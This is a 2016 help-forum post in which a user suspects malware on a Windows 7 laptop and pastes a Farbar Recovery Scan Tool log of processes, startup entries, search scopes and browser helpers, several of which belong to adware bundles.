Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

my computer is infected. [Closed]

Started by cmspears , Jan 10 2016 12:00 PM

Scan result of Farbar Recover

This topic is locked

#1
cmspears

Posted 10 January 2016 - 12:00 PM

New Member

Member
4 posts

Hi, I just recently came across, "one system care". I didn't recognize it and it didn't look right. I can't attribute any problems to it but when I started to check it out I saw it was a type of malware I shouldn't try and remove myself, and recommended geeks to go for help in removing it. I would appreciate any help i can get. Thank you in advance.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:09-01-2015

Ran by Charlie (administrator) on CHARLIE-SILVER (10-01-2016 12:43:19)

Running from C:\Users\Charlie\Downloads

Loaded Profiles: Charlie (Available Profiles: Charlie)

Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)

Internet Explorer Version 11 (Default browser: IE)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe

(Logitech Inc.) C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe

(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe

(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65barsvc.exe

(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe

(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe

(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe

(McAfee, Inc.) C:\Windows\System32\mfevtps.exe

(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTHelperService.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe

(Validity Sensors, Inc.) C:\Windows\System32\valWBFPolicyService.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe

(McAfee, Inc.) C:\Program Files\mcafee\MSC\McAPExe.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe

(Qualcomm®Atheros®) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe

(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe

(Intel Corporation) C:\Windows\System32\igfxEM.exe

(Intel Corporation) C:\Windows\System32\igfxHK.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe

(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe

(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe

(ShopAtHome.com) C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe

(ShopAtHome.com) C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe

(Dropbox, Inc.) C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe

(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\onenotem.exe

(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\BtTray.exe

(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe

(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicator.exe

(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe

(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe

(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe

(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe

(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe

(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe

(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe

(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe

(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\APPINTEGRATOR.EXE

(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator64.exe

(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe

(Apple Inc.) C:\Program Files (x86)\QuickTime\QTTask.exe

(SMART Technologies ULC) C:\Program Files (x86)\SMART Technologies\Education Software\FloatingTools.exe

(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTNotification.exe

(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTTrayIcon.exe

(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTBoardService.exe

(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTInk.exe

(Joyent, Inc) C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\SBWDKService.exe

(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\Office\SMARTInk-SBSDKProxy.exe

(Microsoft Corporation) C:\Windows\System32\wisptis.exe

(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTInkPrivilegedAccess.exe

(Logitech, Inc.) C:\Users\Charlie\AppData\Local\Logitech® Webcam Software\Logishrd\LU2.0\LULnchr.exe

(Logitech, Inc.) C:\Users\Charlie\AppData\Local\Logitech® Webcam Software\Logishrd\LU2.0\LogitechUpdate.exe

(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe

(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe

(McAfee, Inc.) C:\Program Files\mcafee\MAT\McPvTray.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\CommonBuild\McCBEntAndInstru.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

(Microsoft Corporation) C:\Windows\System32\wlanext.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe

(Lavasoft Limited) C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe

() C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe

(Lavasoft) C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe

() C:\Program Files (x86)\Get-a-Clip\MFLService2.exe

() C:\Program Files (x86)\Get-a-Clip\mflstart.exe

(The Chromium Authors) C:\Program Files\FusionBrowser\1.265.1\chrome.exe

() C:\Program Files\WebUpdater\1.0.24.0\WebUpdater.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\McChHost.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Microsoft Corporation) C:\Windows\splwow64.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7573208 2014-04-22] (Realtek Semiconductor)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2818800 2014-06-16] (Synaptics Incorporated)

HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard)

HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard)

HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard)

HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch

HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-04-10] (Intel Corporation)

HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-04-01] (Hewlett-Packard Company)

HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581432 2014-06-09] (Hewlett-Packard Development Company, L.P.)

HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)

HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)

HKLM-x32\...\Run: [] => [X]

HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41360 2015-09-24] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840592 2015-09-24] (Adobe Systems Inc.)

HKLM-x32\...\Run: [FromDocToPDF EPM Support] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65medint.exe [12872 2015-02-11] (Mindspark)

HKLM-x32\...\Run: [FromDocToPDF AppIntegrator 32-bit] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator.exe [225864 2015-02-11] (Mindspark)

HKLM-x32\...\Run: [FromDocToPDF AppIntegrator 64-bit] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator64.exe [258632 2015-02-11] (Mindspark)

HKLM-x32\...\Run: [FromDocToPDF Search Scope Monitor] => "C:\PROGRA~2\FROMDO~2\bar\1.bin\65srchmn.exe" /m=2 /w /h

HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [205336 2011-11-11] (Logitech Inc.)

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)

HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)

HKLM-x32\...\Run: [SMART Floating Tools] => C:\Program Files (x86)\SMART Technologies\Education Software\FloatingTools.exe [9024304 2013-11-20] (SMART Technologies ULC)

HKLM-x32\...\Run: [SMARTNotification] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTNotification.exe [204592 2014-02-12] (SMART Technologies)

HKLM-x32\...\Run: [SMART Tray Tools] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTTrayIcon.exe [744752 2014-02-12] (SMART Technologies)

HKLM-x32\...\Run: [SMART Board Service] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTBoardService.exe [1933616 2014-02-12] (SMART Technologies)

HKLM-x32\...\Run: [sbsdk-server] => C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\NodeLauncher.exe [62768 2013-08-22] (SMART Technologies)

HKLM-x32\...\Run: [SMART Ink] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTInk.exe [147248 2014-02-11] (SMART Technologies)

HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)

HKLM-x32\...\Run: [mflstart] => C:\Program Files (x86)\Get-a-Clip\mflstart.exe [116208 2016-01-10] ()

HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [132736 2013-11-29] (Qualcomm®Atheros®)

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [HP Officejet Pro 8600 (NET)] => C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [GoogleChromeAutoLaunch_A705C234CC82E085351B039A63375E0A] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [741704 2015-12-10] (Google Inc.)

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\AdobeCollabSync.exe [1104288 2015-09-24] (Adobe Systems Incorporated)

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2015-01-28] (Garmin Ltd or its subsidiaries)

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [Dropbox Update] => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-30] (Dropbox, Inc.)

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [ShopAtHomeWatcher] => C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe [130232 2015-07-29] (ShopAtHome.com)

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [ShopAtHomeUpdater] => C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe [199864 2015-07-29] (ShopAtHome.com)

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe [1445648 2016-01-10] (Lavasoft)

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [FusionBrowser] => C:\Program Files\FusionBrowser\1.265.1\chrome.exe [622848 2015-12-02] (The Chromium Authors)

AppInit_DLLs-x32: mfllib.dll => No File

ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)

ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)

ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)

ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)

ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)

ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)

ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)

ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)

ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)

ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)

ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)

Startup: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2015-12-11]

ShortcutTarget: Dropbox.lnk -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

Startup: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2014-12-23]

ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\onenotem.exe (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog9 01 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)

Winsock: Catalog9 02 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)

Winsock: Catalog9 03 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)

Winsock: Catalog9 04 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)

Winsock: Catalog9 16 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)

Winsock: Catalog9-x64 01 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)

Winsock: Catalog9-x64 02 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)

Winsock: Catalog9-x64 03 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)

Winsock: Catalog9-x64 04 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)

Winsock: Catalog9-x64 16 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)

Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

Tcpip\..\Interfaces\{3A7624B7-0B52-4931-9EE9-C9C86582159C}: [DhcpNameServer] 209.18.47.61 209.18.47.62

Tcpip\..\Interfaces\{9381EA84-12A1-427D-AC6D-5FDEA744A58D}: [DhcpNameServer] 40.20.1.201 40.20.1.202

Internet Explorer:

==================

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/?pc=COSP&ptag=D011016-A880FF2AB0987464788F&form=CONMHP&conlogo=CT3332041

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1

URLSearchHook: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 - (No Name) - {4c60e5ab-5c68-4c59-abaa-885010b24b32} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll (Mindspark)

SearchScopes: HKLM -> {59AB8580-D8C1-4DDA-A77F-0B6CA73510AF} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}

SearchScopes: HKLM-x32 -> {59AB8580-D8C1-4DDA-A77F-0B6CA73510AF} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}

SearchScopes: HKLM-x32 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CPTqgNak28MCFYNDaQodFm0ArQ&ptb=C7B3E8DB-D9F3-4E0E-ACA1-5E7ACDA2DFF2&ind=2015021120&n=781ac840&psa=&st=sb&searchfor={searchTerms}

SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D011016-A880FF2AB0987464788F&form=CONBDF&conlogo=CT3332041&q={searchTerms}

SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D011016-A880FF2AB0987464788F&form=CONBDF&conlogo=CT3332041&q={searchTerms}

SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {219102B8-E04D-4B03-8893-C16BC58F8C2A} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C011US0D20151117&p={searchTerms}

SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {59AB8580-D8C1-4DDA-A77F-0B6CA73510AF} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}

SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CPTqgNak28MCFYNDaQodFm0ArQ&ptb=C7B3E8DB-D9F3-4E0E-ACA1-5E7ACDA2DFF2&ind=2015021120&n=781ac840&psa=&st=sb&searchfor={searchTerms}

SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {AC00135D-B960-42EF-871F-3C8F42450A63} URL = hxxp://isearch.shopathome.com?user_id={a862d772-5a24-42bb-8804-35868a911247}&q={searchTerms}

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-12-18] (Microsoft Corporation)

BHO: Advertising Cookie Opt-out -> {8E425EB4-ADBD-4816-B1E8-49BB9DECF034} -> C:\Program Files\Google\Advertising Cookie Opt-out\opt_out.dll [2013-01-10] (Google Inc)

BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2015-12-18] (Microsoft Corporation)

BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)

BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File

BHO-x32: Adobe PDF Reader Link Helper -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2012-09-23] (Adobe Systems Incorporated)

BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2015-12-18] (Microsoft Corporation)

BHO-x32: SMART Notebook Download Utility -> {67BCF957-85FC-4036-8DC4-D4D80E00A77B} -> C:\Program Files (x86)\SMART Technologies\Education Software\NotebookPlugin.dll [2013-11-27] (SMART Technologies ULC.)

BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2016-01-01] (Oracle Corporation)

BHO-x32: Advertising Cookie Opt-out -> {8E425EB4-ADBD-4816-B1E8-49BB9DECF034} -> C:\Program Files (x86)\Google\Advertising Cookie Opt-out\opt_out.dll [2013-01-10] (Google Inc)

BHO-x32: Toolbar BHO -> {a235e1e3-6296-4710-af39-104a7faa6c7c} -> C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll [2015-02-11] (Mindspark)

BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)

BHO-x32: MFLHelper Class -> {B0932222-51E2-47D1-A4EF-CB10AE7DF086} -> C:\Program Files (x86)\Get-a-Clip\MFLPluginIE.dll [2016-01-10] (Get-a-Clip)

BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2015-12-18] (Microsoft Corporation)

BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)

BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2016-01-01] (Oracle Corporation)

BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-10-19] (Hewlett-Packard Company)

BHO-x32: Search Assistant BHO -> {f236ca79-3123-4afb-9f74-e98117ad5625} -> C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll [2015-02-11] (Mindspark)

BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)

